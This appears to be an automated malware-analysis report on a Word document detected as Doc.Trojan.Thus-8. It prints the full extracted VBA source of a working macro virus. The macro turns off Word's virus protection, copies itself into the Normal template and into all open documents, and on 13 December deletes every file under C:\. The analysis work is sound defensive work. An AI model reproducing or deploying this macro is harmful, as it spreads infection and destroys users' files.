Verdict: MALICIOUS
Risk Score: 248

MITRE ATT&CK
- T1059.005 Visual Basic
- T1553.005 Security Software Installation

Malware Insights
The sample contains VBA macros that attempt to disable Word's macro virus protection (Application.Options.VirusProtection = False) and replicate the macro code to other documents, including the Normal template. This behavior is indicative of self-propagating macro-based malware. The macro also carries a date-triggered payload: on 13 December it enumerates files under C:\ with Application.FileSearch and deletes them. The ClamAV detection 'Doc.Trojan.Thus-8' further supports its malicious nature.
Heuristics (5)

- ClamAV: Doc.Trojan.Thus-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Thus-8
- VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings): document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched lines in script:
  ```vb
  On Error Resume Next
  Application.Options.VirusProtection = False
  If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
  ```
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched lines in script:
  ```vb
  Attribute VB_Customizable = True
  Private Sub Document_Open()
  'Thus_001'
  ```
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): repeated 0x07 bytes found
Disassembly (attempted x86 opcode disassembly)

The flagged region is 96 consecutive 0x07 bytes at offsets 000018DC through 0000193B, each decoding as a single-byte `pop es`:

```text
000018DC 07 pop es
000018DD 07 pop es
...      (93 further identical entries)
0000193B 07 pop es
```

A run of identical single-byte instructions is not a usable payload; inside a Word document this pattern is more consistent with filler bytes than with shellcode, and the verdict rests on the macro findings rather than on this heuristic.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2374 bytes |

SHA-256: 06d8b38a317377d80acbc28cd178ec410ded92e796ab90457409f9756b921d85

Detection: ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
' The comment above is line 2 of the module and serves as the infection marker.
On Error Resume Next
' Disable Word's macro virus protection.
Application.Options.VirusProtection = False
' Replication into the global template: if Normal's first module is not
' already marked, wipe it and copy this document's module into it.
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
        .CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
        .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
        .Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
' Replication from the (now infected) Normal template into every open document.
For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
            .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
            .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
            .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
Next k
' Destructive payload, triggered only on 13 December: delete every file found under C:\.
If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
            For i = 1 To .FoundFiles.Count
                Kill .FoundFiles(i)
            Next i
        End If
    End With
End If
End Sub
' Close and New events re-run the same routine, so infection is attempted on every document event.
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
```